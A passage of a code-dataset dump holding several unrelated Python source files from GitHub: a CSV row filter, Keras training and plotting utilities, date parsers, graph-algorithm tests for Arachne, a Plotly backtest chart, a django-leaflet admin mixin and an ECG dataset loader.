is_row_approved = [\n are_arguments_in_current_row(row, kwargs),\n full_name_startswith(row, full_name__startswith),\n email_contains(row, email__contains),\n greater_than(row, salary__gt),\n less_than(row, salary__lt),\n ]\n if all(is_row_approved):\n matched_rows.append(row)\n if order_by == 'salary':\n order_data_by(matched_rows)\n return matched_rows\n\n\ndef count(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n return len(data)\n\n\ndef first(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n if data:\n return data[0]\n return None\n\n\ndef last(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n if data:\n return data[-1]\n return None\n\n\ndef full_name_startswith(row, full_name__startswith):\n if not full_name__startswith:\n return True\n first_name = row[0]\n return True if first_name[:len(full_name__startswith)] == full_name__startswith else False\n\n\ndef email_contains(row, email__contains):\n if not email__contains:\n return True\n email = row[3]\n return True if email[len(email)-len(email__contains):] == email__contains else False\n\n\ndef greater_than(row, salary__gt):\n if not salary__gt:\n return True\n return True if int(row[-1]) > salary__gt else False\n\n\ndef less_than(row, salary__lt):\n if not salary__lt:\n return True\n return True if int(row[-1]) < salary__lt else False\n\n\ndef order_data_by(matched_rows):\n matched_rows.sort(key=lambda row: int(row[-1]))\n\n\ndef print_result(results):\n for row in results:\n for field in row:\n print(field, end=', ')\n print('')\n\n\nif __name__ == '__main__':\n data = read_csv_file('example_data.csv')\n # print(data)\n print_result(filter(data, salary__gt=1000, salary__lt=5000, order_by='salary'))","repo_name":"SashoStoichkovArchive/HB_TASKS","sub_path":"projects/week03/13_03_2019/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8373514380","text":"import inspect\nimport os\n\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nimport pandas as pd\n\n\"\"\"Argument parsing\"\"\"\n\n\ndef list_global_variables(condition=None, filter_underscore=True, **kwargs):\n global globals\n\n def cond(k):\n if k == \"list_global_variables\":\n return False\n if filter_underscore and k.startswith('_'):\n return False\n if condition is not None:\n return condition(k)\n return True\n\n return list(filter(cond, globals().keys()))\n\n\ndef list_global_constants(condition=None, filter_underscore=True, **kwargs):\n upper = set('ABCDEFGHIJKLMNOPQRSTUVWXYZ_1234567890')\n\n def cond(k):\n if condition is not None and not condition(k):\n return False\n if not all(c in upper for c in k):\n return False\n return True\n\n return list_global_variables(condition=cond, filter_underscore=filter_underscore, **kwargs)\n\n\ndef filter_dict_by_value(condition, d):\n return {k: v for k, v in d.items() if condition(v)}\n\n\ndef filter_dict_by_key(condition, d):\n return {k: v for k, v in d.items() if condition(k)}\n\n\ndef list_valid_args(func):\n return list(inspect.signature(func).parameters.keys())\n\n\ndef retrieve_global_variables(keys=None, lower=True, **kwargs):\n if keys is not None:\n d = {k: eval(k) for k in keys}\n else:\n d = {k: eval(k) for k in list_global_variables(**kwargs)}\n return {k.lower(): v for k, v in d.items()}\n\n\ndef retrieve_global_valid_constants(func):\n valid_args = list_valid_args(func)\n constants = list_global_constants(condition=lambda k: not callable(eval(k)))\n keys = [k for k in constants if k.lower() in valid_args]\n return retrieve_global_variables(keys)\n\n\ndef resolve_global_constants(d, **kwargs):\n constants = list_global_constants(**kwargs)\n for k in intersect([k.lower() for k in constants], d.keys()):\n d[k] = eval(k.upper())\n return d\n\n\ndef dict_update(d, d_new):\n for k in set(d).intersection(set(d_new)):\n d[k] = d_new\n return d\n\n\ndef dict_key_lower(d):\n return {k.lower(): v for k, v in d.items()}\n\n\ndef dict_key_upper(d):\n return {k.upper(): v for k, v in d.items()}\n\n\ndef intersect(*keys):\n if len(keys) == 0:\n return []\n if len(keys) == 1:\n return keys\n s = set(keys[0])\n for key in keys[1:]:\n s = s.intersection(set(key))\n return s\n\n\ndef retrieve_args_global_dict(func, d):\n global globals\n\n global_settings = list_global_variables()\n settings = set(d).union(set([k.lower() for k in global_settings]))\n args_dict = dict()\n for k in set(list_valid_args(func)).intersection(settings):\n if k.upper() in global_settings:\n args_dict[k] = eval(k.upper())\n elif d.get(k, None) is not None:\n args_dict[k] = d[k]\n return args_dict\n\n\n\"\"\"Hardware configuration\"\"\"\n\n\ndef solve_hardware():\n try:\n tpu = tf.distribute.cluster_resolver.TPUClusterResolver()\n tf.config.experimental_connect_to_cluster(tpu)\n tf.tpu.experimental.initialize_tpu_system(tpu)\n strategy = tf.distribute.TPUStrategy(tpu)\n print('Running on TPUv3-8')\n except:\n tpu = None\n strategy = tf.distribute.get_strategy()\n print('Running on GPU with mixed precision')\n\n batch_size = 16 * strategy.num_replicas_in_sync\n\n print('Number of replicas:', strategy.num_replicas_in_sync)\n print('Batch size: %.i' % batch_size)\n\n return tpu, strategy\n\n\ndef seed_everything(seed):\n tf.random.set_seed(seed)\n # np.random.set_state(seed)\n\n\ndef plot_history_metric(history, metric, f_best=np.argmax, ylim=None, yscale=None, yticks=None):\n # https://www.kaggle.com/code/markwijkhuizen/rsna-convnextv2-training-tensorflow-tpu?scriptVersionId=116484001\n plt.figure(figsize=(20, 10))\n\n values = history[metric]\n N_EPOCHS = len(values)\n val = 'val' in ''.join(history.keys())\n # Epoch Ticks\n if N_EPOCHS <= 20:\n x = np.arange(1, N_EPOCHS + 1)\n else:\n x = [1, 5] + [10 + 5 * idx for idx in range((N_EPOCHS - 10) // 5 + 1)]\n\n x_ticks = np.arange(1, N_EPOCHS + 1)\n\n # Validation\n if val:\n val_values = history[f'val_{metric}']\n val_argmin = f_best(val_values)\n plt.plot(x_ticks, val_values, label=f'val')\n\n # summarize history for accuracy\n plt.plot(x_ticks, values, label=f'train')\n argmin = f_best(values)\n plt.scatter(argmin + 1, values[argmin], color='red', s=75, marker='o', label=f'train_best')\n if val:\n plt.scatter(val_argmin + 1, val_values[val_argmin], color='purple', s=75, marker='o', label=f'val_best')\n\n plt.title(f'Model {metric}', fontsize=24, pad=10)\n plt.ylabel(metric, fontsize=20, labelpad=10)\n\n if ylim:\n plt.ylim(ylim)\n\n if yscale is not None:\n plt.yscale(yscale)\n\n if yticks is not None:\n plt.yticks(yticks, fontsize=16)\n\n plt.xlabel('epoch', fontsize=20, labelpad=10)\n plt.tick_params(axis='x', labelsize=8)\n plt.xticks(x, fontsize=16) # set tick step to 1 and let x axis start at 1\n plt.yticks(fontsize=16)\n\n plt.legend(prop={'size': 10})\n plt.grid()\n plt.show()\n\n\ndef solve_folder_path(base):\n if not os.path.exists(base):\n os.makedirs(base)\n return base\n for i in range(1000):\n folder = os.path.join(base, f'{i:04d}')\n if not os.path.exists(folder):\n os.makedirs(folder)\n return folder\n\n\ndef plot_training_results_2(folder=\"./exp\"):\n folder = solve_folder_path(folder)\n\n global FOLDS\n\n \"\"\"\n Plot training results\n \"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n\n fig = plt.figure(figsize=(32, 10), constrained_layout=True)\n gs = gridspec.GridSpec(2, FOLDS, figure=fig)\n\n for fold_idx in range(FOLDS):\n tmp_log_dir = os.path.join(folder, f\"fold{fold_idx}_logs/version_0\")\n metrics = pd.read_csv(os.path.join(tmp_log_dir, 'metrics.csv'))\n\n train_acc = metrics['train_f1'].dropna().reset_index(drop=True)\n valid_acc = metrics['valid_f1'].dropna().reset_index(drop=True)\n\n ax = fig.add_subplot(gs[0, fold_idx])\n ax.plot(train_acc, color=\"r\", marker=\"o\", label='train/f1')\n ax.plot(valid_acc, color=\"b\", marker=\"x\", label='valid/f1')\n ax.set_xlabel('Epoch', fontsize=24)\n ax.set_ylabel('F1', fontsize=24)\n ax.set_title(f'fold {fold_idx}')\n ax.legend(loc='lower right', fontsize=18)\n\n train_loss = metrics['train_loss'].dropna().reset_index(drop=True)\n valid_loss = metrics['valid_loss'].dropna().reset_index(drop=True)\n\n ax = fig.add_subplot(gs[1, fold_idx])\n ax.plot(train_loss, color=\"r\", marker=\"o\", label='train/loss')\n ax.plot(valid_loss, color=\"b\", marker=\"x\", label='valid/loss')\n ax.set_ylabel('Loss', fontsize=24)\n ax.set_xlabel('Epoch', fontsize=24)\n ax.legend(loc='upper right', fontsize=18)\n\n\ndef display_result(history, model, i=0):\n try:\n history = history.history\n except:\n pass\n\n try:\n os.mkdir('res')\n except:\n pass\n\n with open(f'res/report.txt', 'w+') as f:\n f.write(f\"acc: {max(history['val_acc'])}\\n\\n\")\n model.summary(print_fn=lambda x: f.write(x + '\\n'))\n\n model.save_weights(os.path.join('res', \"model.h5\"))\n\n print(f\"Acc: {100 * max(history['val_acc'])}\")\n\n plt.plot(history['acc'])\n plt.plot(history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n plt.plot(history['loss'])\n plt.plot(history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\ndef inspect_distribution(m):\n from keract import get_activations\n\n image = tf.random.normal(128, 380, 380, 3, mean=0.5, stddev=0.5)\n\n for layer in m.layers:\n act = get_activations(\n m, image,\n layer_names=layer.name,\n output_format='simple',\n nested=True,\n auto_compile=True\n )\n","repo_name":"1712catfish/keras-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25404181456","text":"def majority(a, code):\n return len(list(filter(lambda x: x == code, a))) * 2 > len(a)\n\ndef findmajority(a):\n code, count = None, 0\n for number in a:\n if count == 0:\n code, count = number, 1\n elif number == code:\n count += 1\n else:\n count -= 1\n return code if majority(a, code) else -1\n\ndef main():\n k, n = map(int, input().split())\n print(' '.join(str(findmajority(list(map(int, input().split())))) for _ in range(k)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"jyothsana-GitHub/Assignment","sub_path":"Maj.py","file_name":"Maj.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30690171256","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\n\ndef getShortDateString(date):\n date = date.split()\n m = 0\n if date[0] == \"Jan\":\n m = 1\n elif date[0] == \"Feb\":\n m = 2\n elif date[0] == \"Mar\":\n m = 3\n elif date[0] == \"Apr\":\n m = 4\n elif date[0] == \"May\":\n m = 5\n elif date[0] == \"Jun\":\n m = 6\n elif date[0] == \"Jul\":\n m = 7\n elif date[0] == \"Aug\":\n m = 8\n elif date[0] == \"Sep\":\n m = 9\n elif date[0] == \"Oct\":\n m = 10\n elif date[0] == \"Nov\":\n m = 11\n elif date[0] == \"Dec\":\n m = 12\n if(len(date) == 2):\n y = int(date[1])\n d = 1\n else:\n y = int(date[2])\n d = int(date[1].split(\",\")[0])\n return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef getLongDateString(date):\n date = date.split()\n m = 0\n if date[0] == \"January\":\n m = 1\n elif date[0] == \"February\":\n m = 2\n elif date[0] == \"March\":\n m = 3\n elif date[0] == \"April\":\n m = 4\n elif date[0] == \"May\":\n m = 5\n elif date[0] == \"June\":\n m = 6\n elif date[0] == \"July\":\n m = 7\n elif date[0] == \"August\":\n m = 8\n elif date[0] == \"September\":\n m = 9\n elif date[0] == \"October\":\n m = 10\n elif date[0] == \"November\":\n m = 11\n elif date[0] == \"December\":\n m = 12\n if(len(date) == 2):\n y = int(date[1])\n d = 1\n else:\n y = int(date[2])\n d = int(date[1].split(\",\")[0])\n return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef toString(date):\n return date.strftime('%Y-%m-%d')\n\ndef subtractYears(date, years):\n return date - relativedelta(years=years)\n\ndef getFullDashedDateString(date):\n y, m, d = [int(\"\".join(x.split())) for x in date.split('-')]\n return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef getDashedDateTime(date):\n y, m, d = [int(\"\".join(x.split())) for x in date.split('-')]\n return datetime.datetime(y, m, d)\n\ndef greaterThanDate(dateA, dateB):\n dtA = getDashedDateTime(dateA)\n dtB = getDashedDateTime(dateB)\n return dtA > dtB\n\ndef greaterThanOrEqualDate(dateA, dateB):\n dtA = getDashedDateTime(dateA)\n dtB = getDashedDateTime(dateB)\n return dtA >= dtB\n\ndef equalDate(dateA, dateB):\n dtA = getDashedDateTime(dateA)\n dtB = getDashedDateTime(dateB)\n return dtA == dtB","repo_name":"DaVinciTachyon/FinalYearProject","sub_path":"dateUtil.py","file_name":"dateUtil.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28361048354","text":"#coding=utf-8\n'''\nCreated on 2017.03.03\n极宽版·深度学习·案例\n摘自·极宽深度学习·系列培训课件\n@ www.TopQuant.vip www.ziwang.com\nTop极宽量化开源团队\n\n'''\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport tflearn\n#import sklearn\nfrom sklearn.cross_validation import train_test_split \n#from __future__ import absolute_import, division, print_function\nimport matplotlib.pyplot as plt\n\n#-----------------\n\"\"\" Linear Regression Example \"\"\"\n\n\n\n# Regression data\n#X = [3.3,4.4,5.5,6.71,6.93,4.168,9.779,6.182,7.59,2.167,7.042,10.791,5.313,7.997,5.654,9.27,3.1]\n#Y = [1.7,2.76,2.09,3.19,1.694,1.573,3.366,2.596,2.53,1.221,2.827,3.465,1.65,2.904,2.42,2.94,1.3]\nfss='data/p100.csv'\ndf=pd.read_csv(fss)\nprint(df.tail())\n#X,Y=df['x'].values,df['y'].values\n#X,Y=df['x'].tolist,df['y'].tolist\nX,Y=list(df['x'].values),list(df['y'].values)\n#print(X)\nprint(type(X))\n# Linear Regression graph\ninput_ = tflearn.input_data(shape=[None])\nlinear = tflearn.single_unit(input_)\nregression = tflearn.regression(linear, optimizer='sgd', loss='mean_square',\n metric='R2', learning_rate=0.001)\nm = tflearn.DNN(regression, tensorboard_verbose=3)\n#m = tflearn.DNN(regression,logdir='/tmp/tflearn_logs', tensorboard_verbose=3)\n#m = tflearn.Trainer(train_ops=m_op,tensorboard_dir='/tmp/tflearn_logs/',tensorboard_verbose=2)\n # Training for 10 epochs.\nm.fit(X, Y, n_epoch=1000, show_metric=True, snapshot_epoch=False)\n\nprint(\"\\nRegression result:\")\nprint(\"Y = \" + str(m.get_weights(linear.W)) +\n \"*X + \" + str(m.get_weights(linear.b)))\n\nprint(\"\\nTest prediction for x = 3.2, 3.3, 3.4:\")\nys2=m.predict(X)\n#print(m.predict([3.2, 3.3, 3.4]))\n# should output (close, not exact) y = [1.5315033197402954, 1.5585315227508545, 1.5855598449707031]\n\n#8.1\nprint('\\n#7,plot')\nplt.plot(X,Y, 'ro', label='Original data')\n#8.2\n\nplt.plot(X, ys2, label='ln_model')\n#\n#8.3\nplt.legend()\nplt.show()\n\n\n","repo_name":"dumpinfo/TsBook","sub_path":"零起点Tensorflow快速入门tf_demo/tf904trx.py","file_name":"tf904trx.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3154653450","text":"from base_test import ArkoudaTest\nimport arkouda as ak\nimport arachne as ar\nimport networkx as nx\n\nclass AlgorithmTest(ArkoudaTest):\n \"\"\"Test graph algorithm methods.\"\"\"\n def build_undirected_graph(self):\n \"\"\"Builds undirected and weighted graphs in both Arachne and NetworkX for tests.\"\"\"\n src_list = [2,5,2,3,3,3,3,2,3,4,5,5,5,5,5,5,7,8,9,9,8,9 ,10,10,10,24,25,25]\n dst_list = [1,0,0,0,3,3,3,3,4,3,5,2,2,2,2,7,8,9,8,8,5,10,7 ,7 ,7 ,24,26,27]\n wgt_list = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1 ,1 ,1 ,1 ,10,20]\n src = ak.array(src_list)\n dst = ak.array(dst_list)\n wgt = ak.array(wgt_list)\n\n ar_graph = ar.Graph()\n ar_graph.add_edges_from(src,dst)\n ar_graph_weighted = ar.Graph()\n ar_graph_weighted.add_edges_from(src,dst,wgt)\n\n ebunch = list(zip(src_list,dst_list))\n nx_graph = nx.Graph()\n nx_graph.add_edges_from(ebunch)\n ebunchw = list(zip(src_list,dst_list,wgt_list))\n nx_graph_weighted = nx.Graph()\n nx_graph_weighted.add_weighted_edges_from(ebunchw)\n\n return ar_graph, nx_graph, ar_graph_weighted, nx_graph_weighted\n\n def build_directed_graph(self):\n \"\"\"Builds directed and weighted graphs in both Arachne and NetworkX for tests.\"\"\"\n src_list = [2,5,2,3,3,3,3,2,3,4,5,5,5,5,5,5,7,8,9,9,8,9 ,10,10,10,24,25,25]\n dst_list = [1,0,0,0,3,3,3,3,4,3,5,2,2,2,2,7,8,9,8,8,5,10,7 ,7 ,7 ,24,26,27]\n wgt_list = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1 ,1 ,1 ,1 ,10,20]\n src = ak.array(src_list)\n dst = ak.array(dst_list)\n wgt = ak.array(wgt_list)\n\n ar_di_graph = ar.DiGraph()\n ar_di_graph.add_edges_from(src,dst)\n ar_di_graph_weighted = ar.DiGraph()\n ar_di_graph_weighted.add_edges_from(src,dst,wgt)\n\n ebunch = list(zip(src_list,dst_list))\n nx_di_graph = nx.DiGraph()\n nx_di_graph.add_edges_from(ebunch)\n ebunchw = list(zip(src_list,dst_list,wgt_list))\n nx_di_graph_weighted = nx.DiGraph()\n nx_di_graph_weighted.add_weighted_edges_from(ebunchw)\n\n return ar_di_graph, nx_di_graph, ar_di_graph_weighted, nx_di_graph_weighted\n\n def test_undirected_bfs_layers(self):\n \"\"\"Tests Arachne bfs_layers() and compares against NetworkX.\"\"\"\n # Read in graphs with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_undirected_graph()\n\n # Extract vertices to launch breadth-first search from each.\n vertices = ar_graph.nodes().to_list()\n\n ar_all_layers = []\n nx_all_layers = []\n for root in vertices:\n # Compute breadth-first search with Arachne.\n ar_layers = ar.bfs_layers(ar_graph, root).to_list()\n\n # Compute breadth-first search with NetworkX.\n nx_layer_dict = dict(enumerate(nx.bfs_layers(nx_graph, root)))\n nx_layers = [-1] * len(ar_layers)\n for layer,vertices_at_layer in nx_layer_dict.items():\n for vertex in vertices_at_layer:\n nx_layers[vertices.index(vertex)] = layer\n\n # Add both to corresponding layers tracker.\n ar_all_layers.append(ar_layers)\n nx_all_layers.append(nx_layers)\n\n return self.assertEqual(ar_all_layers, nx_all_layers)\n \n def test_directed_bfs_layers(self):\n \"\"\"Tests Arachne bfs_layers() and compares against NetworkX.\"\"\"\n # Read in graphs with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_directed_graph()\n\n # Extract vertices to launch breadth-first search from each.\n vertices = ar_graph.nodes().to_list()\n\n ar_all_layers = []\n nx_all_layers = []\n for root in vertices:\n # Compute breadth-first search with Arachne.\n ar_layers = ar.bfs_layers(ar_graph, root).to_list()\n\n # Compute breadth-first search with NetworkX.\n nx_layer_dict = dict(enumerate(nx.bfs_layers(nx_graph, root)))\n nx_layers = [-1] * len(ar_layers)\n for layer,vertices_at_layer in nx_layer_dict.items():\n for vertex in vertices_at_layer:\n nx_layers[vertices.index(vertex)] = layer\n\n # Add both to corresponding layers tracker.\n ar_all_layers.append(ar_layers)\n nx_all_layers.append(nx_layers)\n\n return self.assertEqual(ar_all_layers, nx_all_layers)\n\n def test_square_count(self):\n \"\"\"Tests Arachne squares() and compares it against base case.\"\"\"\n # Read in graph with Arachne.\n ar_graph,_,_,_ = self.build_undirected_graph()\n\n # Get the square count.\n sc = ar.squares(ar_graph)\n\n return self.assertEqual(2, sc)\n\n def test_triangles(self):\n \"\"\"Tests Arachne triangles() and compares it against NetworkX.\"\"\"\n # Read in the graph with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_undirected_graph()\n nodes = [0,2,3,4]\n\n # Get triangle counts with Arachne.\n ar_tri_full = ar.triangles(ar_graph)\n ar_tri_partial = ar.triangles(ar_graph, ak.array(nodes))\n\n # Get triangle counts with NetworkX.\n nx_tri_full = nx.triangles(nx_graph)\n nx_tri_partial = nx.triangles(nx_graph, nodes)\n\n ret = [nx_tri_partial[v] for v in nodes]\n self.assertEqual(ret, ar_tri_partial.to_list())\n self.assertEqual(sum(nx_tri_full.values())/3, ar_tri_full/3)\n return True\n\n # FUNCTIONS BELOW ARE CURRENTLY NOT WORKING AND HAVE TO BE FIXED.\n # def test_connected_components(self):\n # # Process graph with Arachne.\n # filepath,directed,weighted,only_extension = self.get_graph_file_and_attributes()\n # ar_graph = ar.read_edgelist(filepath, directed=directed, weighted=weighted, filetype=only_extension)\n # ar_cc = ar.connected_components(ar_graph)\n\n # # Process graph with NetworkX.\n # nx_file = open(filepath, \"rb\")\n # nx_graph = nx.from_scipy_sparse_array(sp.io.mmread(nx_file))\n # nx_cc = nx.connected_components(nx_graph)\n\n # return self.assertEqual(len(list(nx_cc)), len(ak.unique(ar_cc)))\n\n # def test_k_truss(self):\n # # Process graph with Arachne.\n # filepath,directed,weighted,only_extension = self.get_graph_file_and_attributes()\n # ar_graph = ar.read_edgelist(filepath, directed=directed, weighted=weighted, filetype=only_extension)\n # ar_truss = ar.k_truss(ar_graph, 4)\n # ar_max_k = ar.k_truss(ar_graph, -1)\n\n # # Process graph with NetworkX.\n # nx_file = open(filepath, \"rb\")\n # nx_graph = nx.from_scipy_sparse_array(sp.io.mmread(nx_file))\n # nx_truss = nx.k_truss(nx_graph, 4)\n\n # max_k = 5\n \n # num_e_ar = ak.value_counts(ar_truss)[1][0]\n # num_e_nx = nx_truss.size()\n \n # max_test = self.assertEqual(ar_max_k[0], max_k)\n # truss_test = self.assertEqual(num_e_ar, num_e_nx)\n\n # # NOTE: truss decomposition NOT pytested, it uses code for both k_truss and max_truss.\n # return self.assertEqual(max_test,truss_test)\n \n # def test_triangle_centrality(self):\n # # Process graph with Arachne.\n # graph = ar.Graph()\n # src = ak.array([1, 1, 3, 3, 4, 4, 4, 5, 2, 2, 5, 5, 6])\n # dst = ak.array([3, 4, 4, 7, 7, 5, 8, 8, 5, 6, 6, 9, 9])\n # graph.add_edges_from(src, dst)\n\n # ar_tri_ctr = ar.triangle_centrality(graph).to_list()\n # ar_tri_ctr_true = [0.4, 0.4, 0.4666666666666667, 0.7333333333333333, 0.7333333333333333, 0.4666666666666667, 0.4, 0.4666666666666667, 0.4]\n # print(ar_tri_ctr)\n\n # return self.assertEqual(ar_tri_ctr, ar_tri_ctr_true)\n\n\n\n","repo_name":"Bears-R-Us/arkouda-njit","sub_path":"arachne/test/algorithm_test.py","file_name":"algorithm_test.py","file_ext":"py","file_size_in_byte":7730,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"38090342429","text":"import pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nfrom plotly.subplots import make_subplots\r\n\r\ndf = pd.read_csv(\"backtestResult.csv\")\r\n\r\nfig = make_subplots(rows=3, cols=1, shared_xaxes=True)\r\n\r\nfig.add_trace(go.Scatter(x=df.index,y=df.trade,name='Trade',mode='lines+markers',connectgaps=True, line=dict(color='firebrick', width=1.5, dash='dot')),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.enter,name='Enter price',mode='lines',connectgaps=True, line=dict(color='orange', width=1.5)),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.price,name='Price',mode='lines',connectgaps=True, line=dict(color='grey', width=2)),row=1,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.asset,name='Asset',mode='lines',connectgaps=True, line=dict(color='purple', width=2)),row=2,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.currency,name='Currency',mode='lines',connectgaps=True, line=dict(color='green', width=2)),row=3,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.equity,name='Equity',mode='lines',connectgaps=True, line=dict(color='grey', width=2)),row=3,col=1)\r\nfig.add_trace(go.Scatter(x=df.index,y=df.budgetextra,name='Budget Extra',mode='lines',connectgaps=True, line=dict(color='darkgreen', width=1.5)),row=3,col=1)\r\n\r\nfig.update_traces(hovertemplate='%{y}')\r\nfig.update_layout(title_text=\"Backtest\", hovermode='x unified')\r\n\r\nfig.write_html(\"plottedResults.html\")","repo_name":"McxCZE/PlotlyDemonstration","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17627149353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.admin import ModelAdmin\nfrom django.core.exceptions import ImproperlyConfigured\n\ntry:\n from djgeojson.fields import GeoJSONField\nexcept ImportError:\n GeoJSONField = type(object)\ntry:\n from django.contrib.gis.db.models import GeometryField\nexcept (ImportError, ImproperlyConfigured):\n # When GEOS is not installed\n GeometryField = type(object)\n\nfrom .forms.widgets import LeafletWidget\n\n\nclass LeafletGeoAdminMixin(object):\n widget = LeafletWidget\n map_template = 'leaflet/admin/widget.html'\n modifiable = True\n map_width = '100%'\n map_height = '400px'\n display_raw = False\n settings_overrides = {}\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n \"\"\"\n Overloaded from ModelAdmin to set Leaflet widget\n in form field init params.\n \"\"\"\n is_geometry = isinstance(db_field, (GeometryField, GeoJSONField))\n is_editable = is_geometry and (db_field.dim < 3 or\n self.widget.supports_3d)\n\n if is_editable:\n kwargs.pop('request', None) # unsupported for form field\n # Setting the widget with the newly defined widget.\n kwargs['widget'] = self._get_map_widget(db_field)\n return db_field.formfield(**kwargs)\n else:\n return super(LeafletGeoAdminMixin, self).formfield_for_dbfield(db_field, **kwargs)\n\n def _get_map_widget(self, db_field):\n \"\"\"\n Overriden LeafletWidget with LeafletGeoAdmin params.\n \"\"\"\n class LeafletMap(self.widget):\n template_name = self.map_template\n include_media = True\n geom_type = db_field.geom_type\n modifiable = self.modifiable\n map_width = self.map_width\n map_height = self.map_height\n display_raw = self.display_raw\n settings_overrides = self.settings_overrides\n return LeafletMap\n\n\nclass LeafletGeoAdmin(LeafletGeoAdminMixin, ModelAdmin):\n pass\n","repo_name":"Grace-Amondi/Django-rest-framework-geospatial-tutorial","sub_path":"geaopienv/lib/python3.5/site-packages/leaflet/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"40487008833","text":"import os\nimport itertools\nimport time\nimport random\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport seaborn as sns\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import (CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n StepLR,\n ExponentialLR)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.metrics import accuracy_score, auc, f1_score, precision_score, recall_score\n\n\nclass Config:\n csv_path = ''\n seed = 2021\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n attn_state_path = 'input/mitbih-with-synthetic/attn.pth'\n lstm_state_path = 'input/mitbih-with-synthetic/lstm.pth'\n cnn_state_path = 'input/mitbih-with-synthetic/cnn.pth'\n\n attn_logs = 'input/mitbih-with-synthetic/attn.csv'\n lstm_logs = 'input/mitbih-with-synthetic/lstm.csv'\n cnn_logs = 'input/mitbih-with-synthetic/cnn.csv'\n\n train_csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic_train.csv'\n test_csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic_test.csv'\n\n\ndef seed_everything(seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\n\n\n# ## Dataset and DataLoader\n\n\nclass ECGDataset(Dataset):\n\n def __init__(self, df):\n self.df = df\n self.data_columns = self.df.columns[:-2].tolist()\n\n def __getitem__(self, idx):\n signal = self.df.loc[idx, self.data_columns].astype('float32')\n signal = torch.FloatTensor(np.array([signal.values]))\n target = torch.LongTensor(np.array(self.df.loc[idx, 'class']))\n return signal, target\n\n def __len__(self):\n return len(self.df)\n\ndef get_dataloader(phase: str, batch_size: int = 96) -> DataLoader:\n '''\n Dataset and DataLoader.\n Parameters:\n pahse: training or validation phase.\n batch_size: data per iteration.\n Returns:\n data generator\n '''\n df = pd.read_csv(config.train_csv_path)\n train_df, val_df = train_test_split(\n df, test_size=0.15, random_state=config.seed, stratify=df['label']\n )\n train_df, val_df = train_df.reset_index(drop=True), val_df.reset_index(drop=True)\n df = train_df if phase == 'train' else val_df\n dataset = ECGDataset(df)\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size, num_workers=4)\n return dataloader\n\n\n# # 